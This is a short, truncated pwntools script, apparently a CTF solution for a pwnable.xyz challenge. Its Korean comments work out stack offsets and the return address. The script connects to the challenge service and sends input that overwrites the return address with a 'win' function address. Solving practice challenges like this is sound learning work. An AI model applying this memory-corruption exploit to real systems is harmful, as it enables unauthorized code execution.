from pwn import * p = remote("svc.pwnable.xyz", 30002) # v7 = rbp-0x60 # RET 위치는 rbp+0x8 # 0x68 차이남 (8Byte*13) win = 0x400822 # printf_got = 0x601028 # ASLR 때문에 스택 위치 랜덤, v7 배열 시작 위치도 계속 바뀔 것 # v7과 printf_got 간 차이를 leak 없이 구하긴 힘들다 offset = (0x7fffffffddc0-0x601048)//8 p.recvuntil("Input: ") pay = str(int(win))+" "+str(0)+" "+str(int(13)) p.sendline(pay) # while문 종료시키기 p.recvuntil("Input: ") p.se..